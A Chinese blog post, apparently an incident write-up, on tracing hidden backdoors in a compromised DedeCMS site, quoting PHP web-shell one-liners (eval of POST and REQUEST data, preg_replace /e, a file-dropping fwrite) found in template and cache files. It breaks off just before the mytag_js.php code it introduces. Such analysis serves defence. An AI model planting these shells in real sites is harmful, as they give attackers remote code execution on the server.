使用建站的时候织梦网站老是被修改，尤其是index.html的页面还有index.php被黑链。真的很头疼，如何解决这个问题呢？

小鱼儿博客园，今天探寻一种可以导致被挂黑链的原因。

　　各种webshell扫描器只扫到一个data/tplcache/xxxxx.inc文件，文件代码如下：

　　{dede:php}file_put_contents(’90sec.php’,'<?php eval($_POST[guige]);?>’);{/dede:php}

　　但是翻遍所有的Web目录也没有找到90sec.php文件，有朋友指点说可能是其它文件include这个文件。然后又用Seay的代码审计工具定义关键字各种扫，还是没找到。

　　最后老大翻到data/cache目录下发现了几个htm文件，myad-1.htm,myad-16.htm,mytag-1208.htm等，打开这些html文件，代码分别如下：

　　<!–

　　document.write(“dedecmsisok<?php @eval($_POST[cmd]);?>”);

　　–>

　　<!–

　　document.write(“<?php $fp = @fopen(‘av.php’, ‘a’);@fwrite($fp, ‘<?php eval($_POST[110]) ?>axxxxx’);echo ‘OK’;@fclose($fp);?>”);

　　–>

　　<!–

　　document.write(“<?php echo ‘dedecms 5.7 0day<br>guige, 90sec.org’;@preg_replace(‘/[copyright]/e’,$_REQUEST['guige'],’error’);?>”);

　　–>

　　看到这几个文件很奇怪，不知道黑阔要干嘛？？虽然代码看似很熟悉，但是HTML文件能当后门用么？想起之前朋友说的include,然后结合前段时间的getshell漏洞利用细节，最终翻到plus/mytag_js.php文件，在这个文件里终于发现黑阔无节操的地方，主要代码如下：

赏 支付宝扫码打赏 微信扫码打赏

如果本文对你有帮助，欢迎打赏本站